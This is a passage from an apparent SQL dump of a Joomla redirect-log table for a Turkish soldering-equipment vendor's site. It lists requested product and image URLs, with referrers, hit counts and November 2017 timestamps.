17:49:01','0000-00-00 00:00:00',301),(10647,'http://3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,product_sku',NULL,'','',375,0,'2017-11-09 17:49:03','0000-00-00 00:00:00',301),(10648,'http://3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/dirdesc',NULL,'','',368,0,'2017-11-09 17:49:04','0000-00-00 00:00:00',301),(10649,'http://3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',388,0,'2017-11-09 17:49:09','0000-00-00 00:00:00',301),(10650,'http://3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/ess-310-detail',NULL,'','',378,0,'2017-11-09 17:49:12','0000-00-00 00:00:00',301),(10651,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',408,0,'2017-11-09 17:49:15','0000-00-00 00:00:00',301),(10652,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku',NULL,'','',358,0,'2017-11-09 17:49:17','0000-00-00 00:00:00',301),(10653,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',358,0,'2017-11-09 17:49:19','0000-00-00 00:00:00',301),(10654,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name',NULL,'','',353,0,'2017-11-09 17:49:21','0000-00-00 00:00:00',301),(10655,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc',NULL,'','',356,0,'2017-11-09 17:49:23','0000-00-00 00:00:00',301),(10656,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name',NULL,'','',361,0,'2017-11-09 17:49:26','0000-00-00 00:00:00',301),(10657,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,ordering',NULL,'','',358,0,'2017-11-09 17:49:28','0000-00-00 00:00:00',301),(10658,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_name',NULL,'','',370,0,'2017-11-09 17:49:30','0000-00-00 00:00:00',301),(10659,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',361,0,'2017-11-09 17:49:36','0000-00-00 00:00:00',301),(10660,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,category_name',NULL,'','',375,0,'2017-11-09 17:49:38','0000-00-00 00:00:00',301),(10661,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,mf_name',NULL,'','',382,0,'2017-11-09 17:49:42','0000-00-00 00:00:00',301),(10662,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,ordering',NULL,'','',364,0,'2017-11-09 17:49:45','0000-00-00 00:00:00',301),(10663,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',371,0,'2017-11-09 17:49:49','0000-00-00 00:00:00',301),(10664,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_sku',NULL,'','',380,0,'2017-11-09 17:49:56','0000-00-00 00:00:00',301),(10665,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/dirdesc',NULL,'','',379,0,'2017-11-09 17:50:01','0000-00-00 00:00:00',301),(10666,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',378,0,'2017-11-09 17:50:08','0000-00-00 00:00:00',301),(10667,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,category_name',NULL,'','',404,0,'2017-11-09 17:50:10','0000-00-00 00:00:00',301),(10668,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,ordering',NULL,'','',369,0,'2017-11-09 17:50:17','0000-00-00 00:00:00',301),(10669,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,product_name',NULL,'','',386,0,'2017-11-09 17:50:23','0000-00-00 00:00:00',301),(10670,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,product_sku',NULL,'','',388,0,'2017-11-09 17:50:26','0000-00-00 00:00:00',301),(10671,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/dirdesc',NULL,'','',390,0,'2017-11-09 17:50:28','0000-00-00 00:00:00',301),(10672,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız',NULL,'','',392,0,'2017-11-09 17:50:30','0000-00-00 00:00:00',301),(10673,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',355,0,'2017-11-09 17:50:39','0000-00-00 00:00:00',301),(10674,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız',NULL,'','',381,0,'2017-11-09 17:51:07','0000-00-00 00:00:00',301),(10675,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,`p`.product_sku',NULL,'','',364,0,'2017-11-09 17:51:37','0000-00-00 00:00:00',301),(10676,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,pc.ordering,product_name',NULL,'','',370,0,'2017-11-09 17:51:50','0000-00-00 00:00:00',301),(10677,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/dirdesc',NULL,'','',376,0,'2017-11-09 17:51:57','0000-00-00 00:00:00',301),(10678,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',363,0,'2017-11-09 17:52:01','0000-00-00 00:00:00',301),(10679,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/dirdesc',NULL,'','',359,0,'2017-11-09 17:52:21','0000-00-00 00:00:00',301),(10680,'http://3s-technologies.com.tr/en/products/gf-12-hc-ht-detail?tmpl=component&print=1',NULL,'','',20,0,'2017-11-09 17:56:09','0000-00-00 00:00:00',301),(10681,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/t_ly8c_150x150.jpg',NULL,'','',1,0,'2017-11-09 18:06:02','0000-00-00 00:00:00',301),(10682,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,mf_name',NULL,'','',45,0,'2017-11-09 18:07:26','0000-00-00 00:00:00',301),(10683,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/av132-detail',NULL,'','',57,0,'2017-11-09 18:13:56','0000-00-00 00:00:00',301),(10684,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/mirae_logo_150x150.gif',NULL,'','',1,0,'2017-11-09 18:30:15','0000-00-00 00:00:00',301),(10685,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/logo-ddm_150x150.jpg',NULL,'','',1,0,'2017-11-09 18:31:24','0000-00-00 00:00:00',301),(10686,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-20',NULL,'','',1,0,'2017-11-09 18:32:48','0000-00-00 00:00:00',301),(10687,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/dirdesc',NULL,'','',19,0,'2017-11-09 18:38:29','0000-00-00 00:00:00',301),(10688,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,mf_name',NULL,'','',54,0,'2017-11-09 18:48:16','0000-00-00 00:00:00',301),(10689,'http://3s-technologies.com.tr/tr/component/content/category?format=feed&type=rss',NULL,'','',2,0,'2017-11-09 18:59:30','0000-00-00 00:00:00',301),(10690,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/avk3_1m_150x150.jpg',NULL,'','',2,0,'2017-11-09 19:00:18','0000-00-00 00:00:00',301),(10691,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name?language=en-gb',NULL,'','',2,0,'2017-11-09 19:03:43','0000-00-00 00:00:00',301),(10692,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,ordering',NULL,'','',1,0,'2017-11-09 19:08:37','0000-00-00 00:00:00',301),(10693,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name?language=en-gb',NULL,'','',2,0,'2017-11-09 19:14:34','0000-00-00 00:00:00',301),(10694,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/dirdesc?language=en-gb',NULL,'','',16,0,'2017-11-09 19:22:35','0000-00-00 00:00:00',301),(10695,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/by,mf_name',NULL,'','',52,0,'2017-11-09 19:34:12','0000-00-00 00:00:00',301),(10696,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/kester-logo2_150x150.jpg',NULL,'','',1,0,'2017-11-09 19:55:59','0000-00-00 00:00:00',301),(10697,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/cm602_250x250.png',NULL,'','',1,0,'2017-11-09 19:56:49','0000-00-00 00:00:00',301),(10698,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,mf_name?language=tr-tr',NULL,'','',4,0,'2017-11-09 20:02:19','0000-00-00 00:00:00',301),(10699,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,product_sku/results,1-5',NULL,'','',5,0,'2017-11-09 20:09:06','0000-00-00 00:00:00',301),(10700,'http://3s-technologies.com.tr/en/products/spr-20-detail?tmpl=component&print=1',NULL,'','',9,0,'2017-11-09 20:12:46','0000-00-00 00:00:00',301),(10701,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,category_name/results,1-5',NULL,'','',8,0,'2017-11-09 20:14:14','0000-00-00 00:00:00',301),(10702,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux',NULL,'','',50,0,'2017-11-09 20:18:45','0000-00-00 00:00:00',301),(10703,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/dirdesc',NULL,'','',18,0,'2017-11-09 20:20:53','0000-00-00 00:00:00',301),(10704,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/le40v_400x214_150x150.jpg',NULL,'','',1,0,'2017-11-09 20:26:52','0000-00-00 00:00:00',301),(10705,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer?language=tr-tr',NULL,'','',8,0,'2017-11-09 20:39:24','0000-00-00 00:00:00',301),(10706,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,mf_name?language=en-gb',NULL,'','',3,0,'2017-11-09 20:46:15','0000-00-00 00:00:00',301),(10707,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/index.php/component/users?view=registration',NULL,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j3.2/index.php/component/users?view=registration','',14,0,'2017-11-09 20:46:36','0000-00-00 00:00:00',301),(10708,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/mirae-mx_400_s_250x250.gif',NULL,'','',1,0,'2017-11-09 21:02:41','0000-00-00 00:00:00',301),(10709,'http://www.3s-technologies.com.tr/en/products/jv131-detail?tmpl=component&print=1',NULL,'','',32,0,'2017-11-09 21:02:41','0000-00-00 00:00:00',301),(10710,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/ess-310-left-400x464_150x150.jpg',NULL,'','',1,0,'2017-11-09 21:17:19','0000-00-00 00:00:00',301),(10711,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/sp18_150x150.jpg',NULL,'','',1,0,'2017-11-09 22:18:19','0000-00-00 00:00:00',301),(10712,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/mi-300-detail',NULL,'','',5,0,'2017-11-09 22:31:06','0000-00-00 00:00:00',301),(10713,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/by,product_sku',NULL,'','',47,0,'2017-11-09 22:36:31','0000-00-00 00:00:00',301),(10714,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/dirdesc',NULL,'','',41,0,'2017-11-09 22:53:52','0000-00-00 00:00:00',301),(10715,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/mi-300-detail',NULL,'','',3,0,'2017-11-09 22:59:21','0000-00-00 00:00:00',301),(10716,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-09 23:01:45','0000-00-00 00:00:00',301),(10717,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/t_mi300_150x150.jpg',NULL,'','',1,0,'2017-11-09 23:03:22','0000-00-00 00:00:00',301),(10718,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/mi-300-detail?tmpl=component&print=1',NULL,'','',2,0,'2017-11-09 23:09:31','0000-00-00 00:00:00',301),(10719,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_sku?language=en-gb',NULL,'','',4,0,'2017-11-09 23:13:43','0000-00-00 00:00:00',301),(10720,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/dirdesc?language=en-gb',NULL,'','',4,0,'2017-11-09 23:13:56','0000-00-00 00:00:00',301),(10721,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_name?language=en-gb',NULL,'','',4,0,'2017-11-09 23:16:23','0000-00-00 00:00:00',301),(10722,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,product_sku',NULL,'','',494,0,'2017-11-09 23:17:45','0000-00-00 00:00:00',301),(10723,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_sku?language=en-gb',NULL,'','',250,0,'2017-11-09 23:19:04','0000-00-00 00:00:00',301),(10724,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/dirdesc?language=en-gb',NULL,'','',250,0,'2017-11-09 23:19:14','0000-00-00 00:00:00',301),(10725,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail',NULL,'','',253,0,'2017-11-09 23:19:22','0000-00-00 00:00:00',301),(10726,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,product_name',NULL,'','',233,0,'2017-11-09 23:27:14','0000-00-00 00:00:00',301),(10727,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/rl132-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-11-09 23:45:48','0000-00-00 00:00:00',301),(10728,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim',NULL,'','',6,0,'2017-11-10 00:05:55','0000-00-00 00:00:00',301),(10729,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/mi-300-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-10 00:31:02','0000-00-00 00:00:00',301),(10730,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,ordering?language=tr-tr',NULL,'','',2,0,'2017-11-10 00:40:26','0000-00-00 00:00:00',301),(10731,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/rh6-detail',NULL,'','',51,0,'2017-11-10 00:44:38','0000-00-00 00:00:00',301),(10732,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/mx200lp-detail',NULL,'','',75,0,'2017-11-10 00:52:43','0000-00-00 00:00:00',301),(10733,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/dirdesc?language=en-gb',NULL,'','',3,0,'2017-11-10 01:04:05','0000-00-00 00:00:00',301),(10734,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,ordering?language=en-gb',NULL,'','',22,0,'2017-11-10 01:11:57','0000-00-00 00:00:00',301),(10735,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,mf_name',NULL,'','',1,0,'2017-11-10 01:12:11','0000-00-00 00:00:00',301),(10736,'http://3s-technologies.com.tr/tr/urunler/npm-detail?tmpl=component&print=1',NULL,'','',15,0,'2017-11-10 01:12:14','0000-00-00 00:00:00',301),(10737,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,category_name?language=tr-tr',NULL,'','',8,0,'2017-11-10 01:25:47','0000-00-00 00:00:00',301),(10738,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku?language=tr-tr',NULL,'','',2,0,'2017-11-10 01:30:40','0000-00-00 00:00:00',301),(10739,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,mf_name',NULL,'','',8,0,'2017-11-10 01:44:21','0000-00-00 00:00:00',301),(10740,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-10 01:50:03','0000-00-00 00:00:00',301),(10741,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,ordering',NULL,'','',3,0,'2017-11-10 01:54:30','0000-00-00 00:00:00',301),(10742,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/le-40v-detail',NULL,'','',5,0,'2017-11-10 02:09:36','0000-00-00 00:00:00',301),(10743,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/ess-310-24-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-10 02:11:00','0000-00-00 00:00:00',301),(10744,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/le-40v-detail?tmpl=component&print=1',NULL,'','',4,0,'2017-11-10 02:14:31','0000-00-00 00:00:00',301),(10745,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/by,ordering?language=en-gb',NULL,'','',24,0,'2017-11-10 02:25:25','0000-00-00 00:00:00',301),(10746,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/spartan-8s-8d-44-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-10 02:26:26','0000-00-00 00:00:00',301),(10747,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,ordering',NULL,'','',3,0,'2017-11-10 02:29:40','0000-00-00 00:00:00',301),(10748,'http://www.3s-technologies.com.tr/index.php/en/products/spartan-8s-8d-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-10 02:41:46','0000-00-00 00:00:00',301),(10749,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_name?language=tr-tr',NULL,'','',2,0,'2017-11-10 02:42:11','0000-00-00 00:00:00',301),(10750,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,mf_name',NULL,'','',36,0,'2017-11-10 02:43:07','0000-00-00 00:00:00',301),(10751,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,product_sku',NULL,'','',27,0,'2017-11-10 02:46:34','0000-00-00 00:00:00',301),(10752,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,pc.ordering,product_name',NULL,'','',10,0,'2017-11-10 02:50:03','0000-00-00 00:00:00',301),(10753,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,product_name?language=tr-tr',NULL,'','',26,0,'2017-11-10 02:52:07','0000-00-00 00:00:00',301),(10754,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/dirdesc/results,1-5',NULL,'','',5,0,'2017-11-10 03:00:11','0000-00-00 00:00:00',301),(10755,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/dirdesc/results,1-10',NULL,'','',12,0,'2017-11-10 03:05:20','0000-00-00 00:00:00',301),(10756,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız',NULL,'http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1601.rvrQ5L9cBdQ0-XZf4VEDq81rw6-fHgzW71YRV02-iOzeae3mvTlrHEyZFYUyyMmI.53dcd1d429697be405dd57ad564108c67e53ac3d&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YG-XUIUpxKrkaoPisARVvB8&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWMxemFDUGR1VmZFYUg3ZjR5cjRYVWxpcVlJVzJTWFpJQ0N3LXpMdmZ5U1ZqcFpmbXJJbEtSSUE3ZjA3b0RWYlgyUVlvcEMzY2xsaGJJVUdlV3BZY243UlI4OTY5NjFPQ25ZWmxDRkExRkt5UXl5TFhncGlpNE1BaERaX3JSRlRMV3RVNVp3a1ZnS3ZaM2lSamVZRzJzaG1XcVNOaEZ3VUVlX0xab3pMbUhL&b64e=2&sign=7ae500be4b50fca5d135cf8c3ca82946&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4BTsY_0OwYoHUferPzAfqVPjPpczfR7C12syFyl-TU5m_t73Z0R8uGros1F7dWKuMqxEiGuWLMmDJH3TqLvmjtrCNVQX3LTNfvz4r_zcgc0SfBPPxRdzFWYa8T0_RbZ3U&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWbgDHRNa-0yr9ifWm6bAYZBjmxOd6Hwd6FQRIeX8Dr_m9wQtzjjPRHarWYAG56xMiFS0WFn4ij2paMprcD9HEoh3d3TQI1p7s&l10n=ru&cts=1510283139524&mc=7.15486273581','',242,0,'2017-11-10 03:08:00','0000-00-00 00:00:00',301),(10757,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/dirdesc/results,1-20',NULL,'','',3,0,'2017-11-10 03:15:41','0000-00-00 00:00:00',301),(10758,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/dirdesc/results,1-50',NULL,'','',4,0,'2017-11-10 03:31:00','0000-00-00 00:00:00',301),(10759,'http://3s-technologies.com.tr/index.php/en/products/npm-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-10 04:17:02','0000-00-00 00:00:00',301),(10760,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',26,0,'2017-11-10 05:10:39','0000-00-00 00:00:00',301),(10761,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,category_name',NULL,'','',41,0,'2017-11-10 05:17:06','0000-00-00 00:00:00',301),(10762,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/by,product_name',NULL,'','',13,0,'2017-11-10 05:22:33','0000-00-00 00:00:00',301),(10763,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/by,mf_name',NULL,'','',27,0,'2017-11-10 06:12:43','0000-00-00 00:00:00',301),(10764,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/ess-310-detail',NULL,'','',83,0,'2017-11-10 06:25:49','0000-00-00 00:00:00',301),(10765,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',3,0,'2017-11-10 07:03:23','0000-00-00 00:00:00',301),(10766,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,mf_name?language=en-gb',NULL,'','',2,0,'2017-11-10 07:06:12','0000-00-00 00:00:00',301),(10767,'http://www.3s-technologies.com.tr/tr/anasayfa?format=feed&type=rss',NULL,'','',2,0,'2017-11-10 07:11:09','0000-00-00 00:00:00',301),(10768,'http://3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',16,0,'2017-11-10 07:30:35','0000-00-00 00:00:00',301),(10769,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/dirdesc',NULL,'','',242,0,'2017-11-10 07:48:23','0000-00-00 00:00:00',301),(10770,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail',NULL,'','',24,0,'2017-11-10 08:05:16','0000-00-00 00:00:00',301),(10771,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,ordering?language=tr-tr',NULL,'','',8,0,'2017-11-10 08:12:04','0000-00-00 00:00:00',301),(10772,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer?language=tr-tr',NULL,'','',32,0,'2017-11-10 09:16:22','0000-00-00 00:00:00',301),(10773,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/t_mi300_250x250.jpg',NULL,'','',8,0,'2017-11-10 09:19:21','0000-00-00 00:00:00',301),(10774,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer',NULL,'','',43,0,'2017-11-10 09:19:33','0000-00-00 00:00:00',301),(10775,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler',NULL,'','',62,0,'2017-11-10 09:24:30','0000-00-00 00:00:00',301),(10776,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,category_name?language=tr-tr',NULL,'','',1,0,'2017-11-10 09:34:39','0000-00-00 00:00:00',301),(10777,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/flux',NULL,'','',45,0,'2017-11-10 09:58:17','0000-00-00 00:00:00',301),(10778,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc?language=en-gb',NULL,'','',3,0,'2017-11-10 10:03:46','0000-00-00 00:00:00',301),(10779,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/krem-lehim-31-32-33-34-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-10 10:09:22','0000-00-00 00:00:00',301),(10780,'http://www.3s-technologies.com.tr/en/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',25,0,'2017-11-10 10:17:07','0000-00-00 00:00:00',301),(10781,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,mf_name',NULL,'','',51,0,'2017-11-10 10:24:44','0000-00-00 00:00:00',301),(10782,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/logo-ddm_250x250.jpg',NULL,'','',10,0,'2017-11-10 10:38:03','0000-00-00 00:00:00',301),(10783,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/zero-ion-g3-detail',NULL,'','',45,0,'2017-11-10 11:08:08','0000-00-00 00:00:00',301),(10784,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/cm-602-l-detail',NULL,'','',229,0,'2017-11-10 11:13:19','0000-00-00 00:00:00',301),(10785,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın',NULL,'','',224,0,'2017-11-10 11:18:19','0000-00-00 00:00:00',301),(10786,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/trident-detail',NULL,'','',26,0,'2017-11-10 11:28:18','0000-00-00 00:00:00',301),(10787,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/cm-602-l-detail',NULL,'','',5,0,'2017-11-10 11:58:38','0000-00-00 00:00:00',301),(10788,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/trident-detail',NULL,'','',48,0,'2017-11-10 12:08:42','0000-00-00 00:00:00',301),(10789,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/cm-602-l-detail?tmpl=component&print=1',NULL,'','',5,0,'2017-11-10 12:08:53','0000-00-00 00:00:00',301),(10790,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturers/kester?tmpl=component',NULL,'','',2,0,'2017-11-10 12:19:08','0000-00-00 00:00:00',301),(10791,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı/by,ordering',NULL,'','',509,0,'2017-11-10 12:27:46','0000-00-00 00:00:00',301),(10792,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/results,1-5',NULL,'','',5,0,'2017-11-10 12:29:11','0000-00-00 00:00:00',301),(10793,'http://www.3s-technologies.com.tr/index.php/en/products/e-bar-26-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-10 12:32:05','0000-00-00 00:00:00',301),(10794,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/results,1-10',NULL,'','',5,0,'2017-11-10 12:39:08','0000-00-00 